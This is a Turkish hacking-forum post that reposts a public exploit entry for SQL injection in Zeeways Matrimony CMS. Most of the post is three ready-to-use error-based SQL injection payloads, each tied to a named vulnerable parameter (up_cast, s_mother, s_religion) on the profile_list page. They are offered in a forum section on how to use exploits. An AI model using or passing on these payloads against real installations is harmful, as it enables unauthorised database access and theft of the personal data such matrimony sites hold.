İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

Zeeways Matrimony CMS - SQL Injection

25-03-2019 22:23
#1
deargod - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
vice city
Mesajlar:
167
Teşekkür (Etti):
20
Teşekkür (Aldı):
36
Konular:
15
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı: Zeeways Matrimony CMS - SQL Injection
# Date/Tarih: 25.03.2019
# Exploit Author/Exploit Yazarı: Ahmet Ümit BAYRAM
# Vendor Homepage/Yapımcı Adresi: Matrimony PHP Script | Matrimonial CMS Script - Zeeways CMS
# Demo Site: Matrimony CMS
# Version: Lastest
# Tested on/Test Edilen Platform: Kali Linux
# CVE: N/A


Alıntı:
----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: up_cast (POST)
Payload: (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117) ,CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),C HAR(48),CHAR(117),CHAR(107)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: s_mother (GET)
Payload: (select 1 and row(1%2C1)>(select
count(*)%2Cconcat(concat(CHAR(52)%2CCHAR(67)%2CCHA R(117)%2CCHAR(113)%2CCHAR(82)%2CCHAR(106)%2CCHAR(9 7)%2CCHAR(51)%2CCHAR(113)%2CCHAR(122)%2CCHAR(116)) %2Cfloor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/profile_list?s_mother=1
Vulnerable Parameter: s_religion (POST)
Payload: (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117) ,CHAR(50),CHAR(86),CHAR(74),CHAR(77),CHAR(54),CHAR (109),CHAR(84),CHAR(73)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
# Exploit Adresi : https://www.exploit-db.com/exploits/46603
Kullanıcı İmzası
"Ulusal egemenlik öyle bir nurdur ki, onun karşısında zincirler erir, taç ve tahtlar yanar, mahvolur."
Mustafa Kemal ATATÜRK

telegram: deargod_tht


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı